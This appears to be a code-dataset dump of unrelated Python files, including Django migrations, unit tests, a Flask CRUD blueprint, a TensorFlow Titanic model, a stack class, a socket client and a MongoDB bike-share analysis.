text stringlengths 8 6.05M |
|---|
import tests.test_common as test_common
import tests.test_user as test_user
import tests.test_admin as test_admin
import tests.test_birthdays as test_birthdays
import unittest

if __name__ == '__main__':
    # unittest.makeSuite() was deprecated in 3.11 and removed in 3.13;
    # TestLoader.loadTestsFromTestCase is the documented replacement.
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(test_common.TestsCommonMethods))
    suite.addTest(loader.loadTestsFromTestCase(test_user.TestsUserMethods))
    suite.addTest(loader.loadTestsFromTestCase(test_admin.TestsAdminMethods))
    suite.addTest(loader.loadTestsFromTestCase(test_birthdays.TestsBirthdaysMethods))
    print('[i] Count of tests: ' + str(suite.countTestCases()) + '\n')
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(suite)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-03 02:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Change the default prices: main dishes to 700, side dishes to 100."""

    dependencies = [
        ('home', '0007_auto_20170302_1331'),
    ]

    operations = [
        # AlterField only changes the column default; existing rows keep
        # their stored values.
        migrations.AlterField(
            model_name='main_dish',
            name='price',
            field=models.IntegerField(default=700),
        ),
        migrations.AlterField(
            model_name='side_dish',
            name='price',
            field=models.IntegerField(default=100),
        ),
    ]
|
'''
타이타닉
1. 생존자와 사망자에 대한 갯수를 구하시오
2. 등급별(pclass) 평균 생존률을 구하시오
( 등급과 생존율에 대한 pariplot을 그리시오 )
3. SibSp(가족과탑승) 의 평균 생존율을 구하시오
4. 혼자탑승(alone)한 인원의 평균 생존율을 구하시오
5. 성별 평균 생존율을 구하시오
6. 나이분류 컬럼을 추가하여 아래와 같이 출력하시오
1~15(미성년자), 15~25(청년), 25~35(중년),
35~60(장년), 60~(노년) 으로 표시하시요.
=================
나이 나이분류
20 청년
=================
train, test 구분... 정확, 측정...
7. 나이에 따른 생사를 예측하시오(텐서플로우, 케라스)
survived : 1 (생존), 0 (죽음)
sibsp : 같이 탑승인원, 0 ( 혼자탑승 )
parch : 직계가족
'''
import warnings
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense
from tensorflow.keras import Sequential
from tensorflow.examples.tutorials.mnist import input_data
warnings.filterwarnings('ignore')
pd.set_option('display.max_rows', 1000)
pd.set_option('display.max_columns', 1000)
pd.set_option('display.width', 1000)
# Load the Titanic data and impute missing ages with a fixed value of 30.
df = pd.read_csv('data/titanic.csv')
df['Age'].fillna(30, inplace=True)
# print(df)
# print(df.values)
'''
7. 나이에 따른 생사를 예측하시오(텐서플로우, 케라스)
'''
# Feature: passenger age, shape (N, 1); label: survival flag 0/1, shape (N, 1).
x_data = np.float32(df["Age"].values).reshape(-1, 1)
y_data = np.int32(df["Survived"].values).reshape(-1, 1)
print(x_data.shape)
# Single-feature logistic regression in TF1 graph mode: one weight, one bias.
W = tf.Variable(tf.random_uniform([1, 1]))
b = tf.Variable(tf.random_uniform([1]))
X = tf.placeholder(dtype=tf.float32, shape=[None, 1])
Y = tf.placeholder(dtype=tf.float32, shape=[None, 1])
z = tf.matmul(X, W) + b
hx = tf.sigmoid(z)
# Binary cross-entropy loss, minimised with Adam (lr=0.01).
cost_i = Y * (-tf.log(hx)) + (1 - Y) * (-tf.log(1 - hx))
cost = tf.reduce_mean(cost_i)
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
train = optimizer.minimize(cost)
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
# Train for 1000 full-batch steps, logging the loss every 100 steps.
for i in range(1000):
    _t, _c = sess.run([train, cost], feed_dict={X: x_data, Y: y_data})
    if not i % 100:
        print(i, _c)
# Threshold the sigmoid output at 0.5 to obtain a 0/1 prediction.
predict = tf.cast(hx > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predict, Y), dtype=tf.float32))
# predict
print(sess.run(predict, feed_dict={X: x_data}))
# accuracy
print(sess.run(accuracy, feed_dict={X: x_data, Y: y_data}))
|
#Program to implement Stack
#creating a class Stack
class Stack:
    """Fixed-capacity stack backed by a pre-allocated list.

    ``top`` holds the index of the current top element; -1 means empty.
    """

    def __init__(self, size):
        self.size = size           # maximum number of elements
        self.top = -1              # -1 signals an empty stack
        self.st = [' '] * size     # pre-allocated storage slots

    def isEmpty(self):
        """Return True when the stack holds no elements."""
        return self.top == -1

    def isFull(self):
        """Return True when the stack is at capacity."""
        return self.top == self.size - 1

    def push(self, el):
        """Push *el*; return -1 when the stack is full, otherwise None."""
        if self.isFull():
            return -1
        self.top += 1
        self.st[self.top] = el

    def pop(self):
        """Pop and return the top element, or -1 when the stack is empty."""
        if self.isEmpty():
            return -1
        el = self.st[self.top]
        self.top -= 1
        return el

    def peek(self):
        """Return the top element without removing it (-1 when empty)."""
        return -1 if self.isEmpty() else self.st[self.top]

    def __str__(self):
        """Render size+1 lines: occupied slots as '\\t <el>', the rest blank."""
        rows = []
        for idx in range(self.size + 1):
            rows.append(f'\t {self.st[idx]}\n' if idx <= self.top else '\n')
        return ''.join(rows)
#--------------------------------------main function----------------------------------------#
def main():
    """Menu-driven console loop exercising every Stack operation."""
    stack = Stack(int(input('Enter the size of stack : ')))
    while(True):
        print(
            '------------OPERATIONS-----------\n'
            '\t1. push\n'
            '\t2. pop\n'
            '\t3. top of stack\n'
            '\t4. check for empty\n'
            '\t5. check for full\n'
            '\t6. display stack\n'
            '---------------------------------\n'
        )
        #for performing certain operations make a choice
        ch = int(input('Enter your choice(0 to exit) : '))
        print('\n','-'*35)
        #breaking condition
        if ch == 0:
            break
        #push operation
        elif ch == 1:
            e = (input('Enter the element : '))
            # push() returns -1 on overflow, None on success
            msg = stack.push(e)
            if msg == -1:
                print('Stack is full item cannot be push!!')
            else:
                print('item pushed successfully!!')
        #pop operation; NOTE(review): a stored element equal to -1 is
        #indistinguishable from the empty-stack sentinel here.
        elif ch == 2:
            msg = stack.pop()
            if msg == -1:
                print('Stack is empty item cannot be popped!!')
            else:
                print(' item popped successfully!! \n\n\t item pop : ',msg)
        #peek operation
        elif ch == 3:
            print('PEEK SUCCESSFUL! \n\n\tSTACK[TOP] : ',stack.peek())
        #isEmpty operation
        elif ch == 4:
            print('STACK EMPTY ? : ',stack.isEmpty())
        #isFull operation
        elif ch == 5:
            print('STACK FULL ? : ',stack.isFull())
        #display operation
        elif ch == 6:
            print('STACK SIZE : ',stack.size)
            print(stack)
        #default operation
        else:
            print('INVALID CHOICE!!!')
        print('-'*30,'\n')
#---------------------calling main function----------------------#
if __name__ == '__main__':
    main()
# Copyright (c) 2018 Amdocs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import unittest
import mock
from multicloud_azure.pub.msapi import extsys
from multicloud_azure.pub.vim.vimapi.compute import OperateFlavors
from multicloud_azure.swagger import compute_utils
from multicloud_azure.swagger.views.flavor.views import FlavorsView
from rest_framework import status
# Canned VIM registry record returned by the mocked extsys.get_vim_by_id.
VIM_INFO = {'cloud_extra_info': 1, 'username': 'user1',
            'password': '1234', 'default_tenant': 't1',
            'cloud_region_id': 'r1'}
class FlavorViewTest(unittest.TestCase):
    """Tests for FlavorsView.get and compute_utils.convert_vmsize_aai."""

    def setUp(self):
        self.fsv = FlavorsView()

    def tearDown(self):
        pass

    @mock.patch.object(compute_utils, 'convert_vmsize_aai')
    @mock.patch.object(OperateFlavors.OperateFlavors, 'list_flavors')
    @mock.patch.object(extsys, 'get_vim_by_id')
    def test_flavors_get_fail(self, mock_vim_info,
                              mock_flavors, mock_formatter):
        """GET must answer HTTP 500 for this mocked flavor list."""
        mock_vim_info.return_value = VIM_INFO

        # Minimal stand-in for backend flavor objects.
        class Flavor:
            def __init__(self, id, name):
                self.id = id
                self.name = name

        f1 = Flavor(1, "f1")
        f2 = Flavor(2, "f2")
        flavors = [f1, f2]
        mock_flavors.return_value = flavors
        mock_formatter.return_value = flavors

        # Minimal stand-in for a DRF request carrying query params.
        class Request:
            def __init__(self, query_params):
                self.query_params = query_params

        req = Request({'k': 'v'})
        self.assertEqual(
            status.HTTP_500_INTERNAL_SERVER_ERROR,
            self.fsv.get(req, "vimid").status_code)

    def test_vmsize_aai(self):
        """convert_vmsize_aai must map Azure VM-size fields onto AAI keys."""
        expected = {
            'name': "abc",
            'vcpus': 1,
            'ram': 123,
            'disk': 1234
        }

        class VmSize:
            def __init__(self, name, number_of_cores, memory_in_mb,
                         os_disk_size_in_mb):
                self.name = name
                self.number_of_cores = number_of_cores
                self.memory_in_mb = memory_in_mb
                self.os_disk_size_in_mb = os_disk_size_in_mb

        v1 = VmSize("abc", 1, 123, 1234)
        # assertEqual: assertEquals is a deprecated alias removed in 3.12.
        self.assertEqual(expected, compute_utils.convert_vmsize_aai(v1))
|
from django.apps import AppConfig
class KrwapiConfig(AppConfig):
    """Django application configuration for the ``krwapi`` app."""
    name = 'krwapi'
|
import os
import cv2
from PIL import Image
def pil_loader(path):
    """Open the image at *path* and return it converted to RGB.

    Opening through an explicit file handle avoids a ResourceWarning
    (https://github.com/python-pillow/Pillow/issues/835).
    """
    with open(path, 'rb') as handle, Image.open(handle) as image:
        return image.convert('RGB')
class VideoDatasetAdapter(object):
    """Adapter exposing KITTI-style video frames listed in a split file."""

    def __init__(self, main_folder, split, side):
        split_file = os.path.join(main_folder, "splits", split, "train_files.txt")
        with open(split_file) as fd:
            self.filenames = fd.readlines()
        self._main_folder = main_folder
        self._length = len(self.filenames)
        self.loader = pil_loader
        self.side_map = {"2": 2, "3": 3, "l": 2, "r": 3}
        self._img_size = [370, 1226]
        self._img_ext = ".png"
        self._side = side

    def get_image_size(self):
        """Return the stored image size."""
        return self._img_size

    def __getitem__(self, index):
        """Load and return the image for the *index*-th split-file entry."""
        parts = self.filenames[index].split()
        folder = parts[0]
        # Entries are either "folder" alone or "folder frame_index side".
        if len(parts) == 3:
            frame_index = int(parts[1])
            side = parts[2]
        else:
            frame_index = 0
            side = None
        frame_name = "{:010d}{}".format(frame_index, self._img_ext)
        image_path = os.path.join(
            self._main_folder, "kitti_data", folder,
            "image_0{}/data/{}".format(self.side_map[self._side], frame_name))
        return self.loader(image_path)

    def __len__(self):
        return self._length
a = 1


def hello_world():
    """Print a greeting.

    Fix: the original ``def hello world():`` contained a space in the
    function name and was a SyntaxError.
    """
    print("hello world")


b = 2
c = 3
num = 100
|
from config import DATABASE
from flask import Flask,escape,request,redirect,url_for,render_template,Blueprint
import pymysql
from config import *
# Blueprint grouping the member-management views; a single module-level
# connection is shared by every request.
# NOTE(review): a per-request connection (or pool) would be safer under load.
member = Blueprint('member',__name__)
con = pymysql.connect(HOST,USER,PASS,DATABASE)
@member.route('/showmember')
def Showmember():
    """Render the member list page from every row of membertb."""
    with con:
        cur = con.cursor()
        sql = "SELECT * FROM membertb"
        cur.execute(sql)
        rows = cur.fetchall()
    return render_template('showmember.html',name = "ข้อมูลสมาชิก",members=rows)
@member.route('/editmember',methods=["POST"])
def Editmember():
    """Update one member row from the POSTed form, then redirect to the list."""
    if request.method == 'POST':
        # Form fields map 1:1 onto the membertb columns.
        id = request.form['id']
        fname = request.form['fname']
        lname = request.form['lname']
        sex = request.form['sex']
        birthdate = request.form['birthdate']
        email = request.form['email']
        with con:
            cur = con.cursor()
            # Parameterised UPDATE keyed on the member primary key.
            sql = "update membertb set m_fname = %s,m_lname = %s,m_sex = %s,m_birthdate = %s,m_email = %s where m_id = %s"
            cur.execute(sql,(fname,lname,sex,birthdate,email,id))
            con.commit()
            cur.close()
        return redirect(url_for('member.Showmember'))
@member.route('/deletemember',methods=["POST"])
def Delmember():
    """Delete the member whose primary key is POSTed as ``id``."""
    if request.method == 'POST':
        # Renamed from ``id`` to avoid shadowing the builtin.
        member_id = request.form['id']
        with con:
            cur = con.cursor()
            sql = "DELETE FROM membertb WHERE m_id = %s"
            # (member_id,) is a one-element tuple; the original passed (id),
            # which is just a parenthesised string, not a parameter sequence.
            cur.execute(sql, (member_id,))
            con.commit()
            cur.close()
        return redirect(url_for('member.Showmember'))
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
from rrt_star import RRT_star
# Plan a path from start to goal inside the bounding box while avoiding the
# obstacle, then plot the result.
start = np.array([0, 0, 0])
end = np.array([1, 1, 1])
# Axis-aligned workspace bounds: [min corner, max corner].
bounds = np.array([[-1, -1, -1], [2, 2, 2]])
# Obstacle row: presumably [x, y, z, radius] — TODO confirm against RRT_star.
obstacles = np.array([[.5, .5, .5, .5]])
alg = RRT_star(start, end, bounds, obstacles)
# 5000 sampling iterations.
alg.run(5000)
alg.visualize(end, .1)
|
# Generated by Django 3.0.3 on 2020-04-29 01:50
from django.db import migrations
from django.contrib.auth.models import User
from issues.models import Employee
def create_superuser(apps, schema_editor):
    """Data-migration step: create the root superuser and its Employee row.

    NOTE(review): credentials are hard-coded ('root'/'root') — acceptable for
    a dev fixture, but must not ship to production.
    """
    user = User.objects.create_superuser(
        username='root', password='root', email='root@gmail.com')
    employee = Employee(user=user, level=3,
                        first_name="root", last_name="root")
    employee.save()
# Fixture data for the regular users created by this migration; ``level`` is
# the Employee access level (level 3 additionally grants staff status in
# create_other_users below).
people = [
    {
        'username': 'liam',
        'password': 'liam',
        'first_name': 'Liam',
        'last_name': 'Nguyen',
        'level': 1
    },
]
def create_other_users(apps, schema_editor):
    """Create an auth User plus an Employee row for each entry in *people*.

    Fix: the original set ``user.is_staff = True`` for level-3 entries but
    never saved the user afterwards, so the flag was silently lost.
    """
    for person in people:
        user = User.objects.create_user(
            username=person['username'], password=person['password'])
        if person['level'] == 3:
            user.is_staff = True
            user.save()  # persist the staff flag (missing in the original)
        employee = Employee(
            user=user, first_name=person['first_name'],
            last_name=person['last_name'], level=person['level'])
        employee.save()
def create_all(apps, schema_editor):
    """Run both user-creation steps in order (superuser first)."""
    create_superuser(apps, schema_editor)
    create_other_users(apps, schema_editor)
class Migration(migrations.Migration):
    """Seed the database with the superuser and the fixture users."""

    dependencies = [
        ('issues', '0001_initial'),
    ]

    operations = [migrations.RunPython(
        create_all)]
|
# Giang Ly
# CS464 Project
# Client.py
import socket
def Main():
    """Takes user input from client after
    connecting to specific IP and
    port. Returns the message in all CAPS.
    """
    ## Determine the host
    host = input("Name of server:")
    ## Determine the port number.
    # int() instead of eval(): eval executes arbitrary code typed by the
    # user, and a port is always an integer anyway.
    port = int(input("Port Number:"))
    mySocket = socket.socket()
    mySocket.connect((host, port))
    # Echo loop: send each line, print the server's reply, until 'q'.
    message = input(" -> ")
    while message != 'q':
        mySocket.send(message.encode())
        data = mySocket.recv(1024).decode()
        print('Received from server: ' + data)
        message = input(" -> ")
    mySocket.close()

if __name__ == '__main__':
    Main()
|
# Generated by Django 3.1.7 on 2021-03-23 21:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the C2BPayment table storing raw M-Pesa C2B callback fields."""

    dependencies = [
        ('mpesa_api', '0003_auto_20210312_2038'),
    ]

    operations = [
        migrations.CreateModel(
            name='C2BPayment',
            # All payload fields are optional CharFields mirroring the raw
            # callback: amounts and timestamps are stored as received.
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('transaction_type', models.CharField(blank=True, max_length=15, null=True)),
                ('transaction_id', models.CharField(blank=True, max_length=12, null=True)),
                ('transaction_time', models.CharField(blank=True, max_length=14, null=True)),
                ('transaction_amount', models.CharField(blank=True, max_length=12, null=True)),
                ('business_shortcode', models.CharField(blank=True, max_length=6, null=True)),
                ('bill_ref_number', models.CharField(blank=True, max_length=20, null=True)),
                ('invoice_number', models.CharField(blank=True, max_length=20, null=True)),
                ('org_account_balance', models.CharField(blank=True, max_length=12, null=True)),
                ('third_party_trans_id', models.CharField(blank=True, max_length=20, null=True)),
                ('MSISDN', models.CharField(blank=True, max_length=12, null=True)),
                ('first_name', models.CharField(blank=True, max_length=20, null=True)),
                ('middle_name', models.CharField(blank=True, max_length=20, null=True)),
                ('last_name', models.CharField(blank=True, max_length=20, null=True)),
            ],
        ),
    ]
|
# Instantiate the headline-generation model once at import time so that
# callers reuse the loaded instance.
from headline_generator.predict import Predict_model2

model = Predict_model2()
|
###################################################################
#
# CSSE1001 - Assignment 1
#
# Student Number: 43034002
#
# Student Name: Jiefeng Hou (Nick)
#
###################################################################
def interact():
    """Stub entry point: load and print the marks from 'marks.csv'."""
    get_marks_from_file('marks.csv')
"""Get marks module"""
def get_marks_from_file(filename):
"""Return the marks from the file"""
import csv
f=open(filename,'rU')
line=[]
for c in f:
line.append(c.strip('\n').split(','))
print line
"""Update marks module"""
def update_mark(all_marks, stud_num, mark, column, check_result_exists):
    """Set *mark* in *column* for the row whose student number is *stud_num*.

    ``check_result_exists`` guards overwriting: the cell is only written when
    its truthiness differs from the flag, otherwise an 'update ignored'
    message is printed. ``a`` counts matches so the 'no match found' message
    prints at most once.
    """
    column=int(column)
    a=0
    for c in all_marks:
        if c[0]==stud_num:
            a=a+1
            if check_result_exists!=bool(c[column]):
                c[column]=mark
            else:
                print '{0} has a value in column {1} - update ignored'.format(c[0],column)
        # NOTE(review): this fires on the first non-matching row, so a later
        # match in the list would still print 'no match found' — verify intent.
        if stud_num !=c[0] and a==0:
            print '{0} cannot be merged - no match found.'.format(stud_num)
            a=a+1
"""Merge marks module"""
def merge_marks(all_marks, new_marks, column):
    """Copy *column* values from *new_marks* rows into matching *all_marks* rows.

    Rows are matched on the student number in position 0; only empty cells are
    filled, otherwise an 'update ignored' message is printed.
    """
    a=0
    column=int(column)
    for c in all_marks:
        for i in new_marks:
            if c[0]==i[0]:
                if c[column]=='':
                    c[column]=i[column]
                else:
                    print '{0} has a value in column {1} - update ignored'.format(c[0],column)
            # NOTE(review): prints for the first non-matching pair only
            # (a==0 gate) — a genuine later match is not considered. Verify.
            if c[0]!=i[0] and a==0:
                print '{0} cannot be merged - no match found.'.format(i[0])
                a=a+1
"""Save marks module"""
def save_marks_to_file(records,filename):
    """Write *records* (list of rows) to *filename* as CSV.

    An empty filename aborts the save and prints 'Merge ignored.'.
    """
    import csv
    if filename=='':
        print 'Merge ignored.'
    else:
        # 'wb' is the correct csv mode on Python 2.
        fileName=csv.writer(open(filename,'wb'))
        for c in records:
            fileName.writerow(c)
        print 'Done.'
##################################################
# !!!!!! Do not change (or add to) the code below !!!!!
#
# This code will run the interact function if
# you use Run -> Run Module (F5)
# Because of this we have supplied a "stub" definition
# for interact above so that you won't get an undefined
# error when you are writing and testing your other functions.
# When you are ready please change the definition of interact above.
###################################################
if __name__ == '__main__':
    interact()
|
import sys
def fibonacii(n):
    """Generator yielding the first n+1 Fibonacci numbers, starting at 0."""
    current, nxt = 0, 1
    for _ in range(n + 1):
        yield current
        current, nxt = nxt, current + nxt
# Print the first 11 Fibonacci numbers, then exit.
f = fibonacii(10)
while True:
    try:
        print(next(f), end=' ')
    # Bug fix: an exhausted generator raises StopIteration, not
    # StopAsyncIteration — the original except clause could never match,
    # so the script crashed instead of exiting cleanly.
    except StopIteration:
        sys.exit()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 16:06:35 2017
@author: Diabetes.co.uk
"""
#this files allow you to update the sampledatabase with new questions and answers,
#the new entries need to be stores in a csv file named 'NewQuestionsWithAnswersAndClassCSV.csv' with in CSVfiles
import pandas as pd
import nltk
import functions_for_extracting_pronouns_and_entities_using_api as extract
# Load the original Q&A database (indexed by ID).
sampledatabase = pd.read_csv('CSVfiles\\sampledatabase.csv', index_col = 'ID', encoding = 'utf-8') #loading the original database
#######################################################################
### Analysing the new entries and appending them to the orginal sampledatabase
#######################################################################
NewQuestions = pd.read_csv('CSVfiles\\NewQuestionsWithAnswersAndClassCSV.csv', index_col = 'ID', encoding = 'utf-8')
Answers = NewQuestions['ANSWER']
Questionsonly = NewQuestions['QUESTION']
# Keep only the first sentence of each answer, lower-cased.
firstsent = []
for row in Answers:
    results = nltk.sent_tokenize(row)
    firstsent.append(results[0].lower())
NewQuestions['Answerfirstsent'] = firstsent
#Extracting the adjectives, nouns, named entities of the sentences and storing it in new columns:
AnswerAdjectives = []
AnswerNouns = []
AnswerEntities = []
for rows in firstsent:
    tokens1 = extract.get_tokens(rows)
    aNOUN = extract.Nounswords(tokens1)
    AnswerNouns.append(aNOUN)
    #Adjectives
    aADJECTIVE = extract.Adjectivewords(tokens1)
    AnswerAdjectives.append(aADJECTIVE)
    #Named entities
    named_entities1 = extract.entities_name1(rows)
    AnswerEntities.append(named_entities1)
# Same extraction, but for the question text itself.
QuestionsAdjectives = []
QuestionsNouns = []
QuestionsEntities = []
for rows in Questionsonly:
    tokens1 = extract.get_tokens(rows)
    aNOUN = extract.Nounswords(tokens1)
    QuestionsNouns.append(aNOUN)
    #Adjectives
    aADJECTIVE = extract.Adjectivewords(tokens1)
    QuestionsAdjectives.append(aADJECTIVE)
    #Named entities
    named_entities1 = extract.entities_name1(rows)
    QuestionsEntities.append(named_entities1)
# Attach every extracted feature as a new column.
NewQuestions['QuestionsAdjectives'] = QuestionsAdjectives
NewQuestions['QuestionsNouns'] = QuestionsNouns
NewQuestions['QuestionsEntities'] = QuestionsEntities
NewQuestions['AnswerAdjectives'] = AnswerAdjectives
NewQuestions['AnswerNouns'] = AnswerNouns
NewQuestions['AnswerEntities'] = AnswerEntities
##first appending the new entries with the orginal database and return a csv files with the Duplicates.
sampledatabase = sampledatabase.append(NewQuestions)
sampledatabase = sampledatabase.reset_index()
# Re-number the IDs sequentially after the append.
ID = []
for i in range(len(sampledatabase['ANSWER'])):
    ID.append(i)
sampledatabase['ID'] = ID
sampledatabase.to_csv('CSVfiles\\sampledatabasewithDuplicates.csv', index=False, encoding = 'utf-8')
#then selecting the duplicate questions, and extract those duplicates and saved in a csv file to store these duplicates to be checked.
duplicates = sampledatabase.duplicated('QUESTION', keep = False)
duplicateentries = sampledatabase[duplicates]
duplicateentries = duplicateentries.sort_values(by = 'QUESTION')
duplicateentries.to_csv('CSVfiles\\Duplicate_Questions.csv', index=False, encoding = 'utf-8')
#lastly, removing all duplicate from the database except their 1st entry, so not duplicates remain, and return it as an updatated database sampledatabase1.
sampledatabasenoduplicates = sampledatabase.drop_duplicates('QUESTION', keep = 'first')
# Re-number IDs again for the de-duplicated frame.
ID = []
for i in range(len(sampledatabasenoduplicates['ANSWER'])):
    ID.append(i)
sampledatabasenoduplicates['ID'] = ID
sampledatabasenoduplicates.to_csv('CSVfiles\\sampledatabase1.csv', index=False, encoding = 'utf-8')
#--*-- coding:utf -8 --*--
import time
class Foo(object):
    """Trivial holder exposing its single value through a read/write property."""

    def __init__(self, var):
        super(Foo, self).__init__()
        self._var = var

    @property
    def var(self):
        """The wrapped value."""
        return self._var

    @var.setter
    def var(self, value):
        self._var = value
def deco(func):
def wrapper():
startTime=time.time()
func()
endTime=time.time()
msecs=(endTime-startTime)*1000
print"process run %f ms"%msecs
return wrapper
def myfunc():
    """Sample workload: sleep 0.6s between two progress prints."""
    print'start myfunc'
    time.sleep(0.6)
    print 'end myfunc'
print 'myfunc is :',myfunc.__name__
# Apply the timing decorator manually (equivalent to @deco above myfunc).
myfunc=deco(myfunc)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 5 20:01:41 2018
@author: Octavio Ordaz y Amanda Velasco
"""
#---------------------Librerias-------------------------------------#
#Libreria para leer desde archivos csv
import pandas as pd
#Libreria para trabajar con documentos JSON
import json
#Libreria que ocupamos para graficar los resultados de las consultas
import matplotlib.pyplot as plt
#En la consola usar: %matplotlib auto para graficar en ventana nueva.
#Libreria para operaciones matemáticas
from math import sin, cos, sqrt, asin, pi
#Librería para escribir y leer archivos csv
import csv
#------------------------------------------------------------------#
#---------------------Conexion-------------------------------------#
#Hace conexion entre Python y Mongo
# Connect Python to the local MongoDB instance.
from pymongo import MongoClient as Connection
connection = Connection('localhost',27017)
# Use (creating on first insert) the "ecobicis" database.
db = connection.ecobicis
# --- Import the source CSVs into Mongo ---------------------------------
# January trips: CSV -> JSON records -> "bicis" collection.
data = pd.read_csv('2018-01.csv')
data_json = json.loads(data.to_json(orient='records'))
db.bicis.insert_many(data_json)
# Station catalogue: CSV -> JSON records -> "estaciones" collection.
data = pd.read_csv('estaciones.csv')
data_json = json.loads(data.to_json(orient='records'))
db.estaciones.insert_many(data_json)
# Handles to both collections.
collBic = db.bicis
collEst = db.estaciones
# --- Histogram of user ages --------------------------------------------
# Collect every user age from the trips collection.
edades = []
for doc in collBic.find({},{"_id":0,"Edad_Usuario":1}):
    edades.append(doc["Edad_Usuario"])
# Plot the ages in 10 bins over the 18-80 range, in a new window.
plt.figure()
plt.hist(edades,bins=10,range=(18,80))
plt.title("Histograma de edades",size=15)
plt.xlabel("Edad en años")
plt.ylabel("Cantidad de personas")
#------------------------------------------------------------------#
#----------Plot: number of users per day (January 2018)------------#
# Dates checked and the matching trip counts.
fechaRetiro = []
cantidad = []
for i in range(1,32):
    # Build the dd/01/2018 date string (zero-padded day).
    if i < 10:
        fecha = "0"+str(i)+"/01/2018"
    else:
        fecha = str(i)+"/01/2018"
    fechaRetiro.append(fecha)
    # Count the trips that started on that date.
    # NOTE(review): the projection key ":id" looks like a typo for "_id",
    # but it only affects returned fields, not the count — verify.
    cantidad.append(collBic.find({"Fecha_Retiro":fecha},{":id":0,"Bici":1}).count())
# Scatter + connecting line of trips per day, in a new window.
plt.figure()
plt.plot(fechaRetiro,cantidad,'bo',fechaRetiro,cantidad,'b')
plt.title("Cantidad de usuarios al día",size=15)
# Rotate the date labels vertically so they fit.
plt.xlabel("Fecha")
plt.xticks(rotation=90)
plt.ylabel("Cantidad de usuarios")
plt.grid(True)
#------------------------------------------------------------------#
#-------Collect per-postcode statistics for Chernoff-face plots----------
c = pi/180 #degrees -> radians conversion factor
# Per-postcode aggregates (keyed by postal code):
cp = {}         # postal code -> list of station ids
edad = {}       # mean user age
genero = {}     # gender balance (running sum: F -> +1, otherwise -1)
viajes = {}     # mean trips per station
distancia = {}  # mean trip distance
hora = {}       # busiest departure hour
# Map every station id to its postal code (skip incomplete records).
for doc in collEst.find({},{"_id":0,"id":1, "zip":1}):
    if doc["id"] is None or doc["zip"] is None:
        continue
    est = int(doc["id"])
    codigo = int(doc["zip"])
    if codigo in cp:
        cp[codigo].append(est)
    else:
        cp[codigo] = [est]
# Aggregate trip data for every postal code.
for codigo in cp:
    ed = 0      # summed ages
    g = 0       # gender running sum
    v = 0       # trip count
    d = 0       # summed distances
    horas = {}  # hour -> departure frequency
    for clave in cp[codigo]:
        for doc in collBic.find({"Ciclo_Estacion_Retiro":clave},{"Edad_Usuario":1, "Genero_Usuario":1, "Ciclo_Estacion_Arribo":1}):
            destino = doc["Ciclo_Estacion_Arribo"]
            if destino == 111 or destino == 103 or destino > 446: #insufficient data for these stations
                continue
            ed = ed + doc["Edad_Usuario"]
            g = g + 1 if doc["Genero_Usuario"]=='F' else g - 1
            v = v + 1
            # Trip length from the two stations' coordinates (Haversine).
            inicioLon = collEst.find({"id":clave},{"_id":0,"lon":1}).limit(1)[0]["lon"]
            inicioLat = collEst.find({"id":clave},{"_id":0,"lat":1}).limit(1)[0]["lat"]
            finLon = collEst.find({"id":destino},{"_id":0,"lon":1}).limit(1)[0]["lon"]
            finLat = collEst.find({"id":destino},{"_id":0,"lat":1}).limit(1)[0]["lat"]
            d = d + (2*6367.45*asin(sqrt(sin(c*(finLat-inicioLat)/2)**2+cos(c*inicioLat)*cos(c*finLat)*sin(c*(finLon-inicioLon)/2)**2)))
        # Count departures per hour-of-day for this station.
        for i in range(0, 24):
            menor = str(i) + ":00:00"
            mayor = str(i+1) + ":00:00"
            # Zero-pad single-digit hours so string comparison works.
            if len(menor) < 8:
                menor = "0"+menor
            if len(mayor) < 8:
                mayor = "0"+mayor
            frec = collBic.find({"Hora_Retiro":{"$gte":menor, "$lt":mayor},"Ciclo_Estacion_Retiro":clave},{"_id":1}).count()
            if i in horas:
                horas[i] = horas[i] + frec
            else:
                horas[i] = frec
    # Reduce the sums to per-postcode averages.
    # NOTE(review): d is divided by the *averaged* v (v is reassigned on the
    # previous line), not the raw trip count — verify this is intentional.
    ed = ed/v
    v = v/len(cp[codigo])
    d = d/v
    edad[codigo] = ed
    genero[codigo] = g
    viajes[codigo] = v
    distancia[codigo] = d
    # Busiest hour = first hour reaching the maximum frequency.
    aux = max(horas.values())
    for clave in horas:
        if horas[clave] == aux:
            hora[codigo] = clave
            break
# Export the aggregates to CSV for the Chernoff-face plotting done in R.
i = 1
with open('datos.csv','w') as archivo:
    fila = csv.writer(archivo)
    fila.writerow(['Num', 'CP', 'Colonia', 'Distancia', 'Horas', 'Genero', 'Edad', 'Viajes'])
    for codigo in cp:
        fila.writerow([i, codigo, 'Colonia', distancia[codigo], hora[codigo], genero[codigo], edad[codigo], viajes[codigo]])
        i = i + 1
# Redundant: the with-block already closed the file (harmless no-op).
archivo.close()
#------------------------------------------------------------------#
|
import time
import json
import os
from functools import partial
from selenium import webdriver
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.common.exceptions import NoSuchElementException, TimeoutException, WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.color import Color
from selenium.webdriver.support.select import Select as _Select
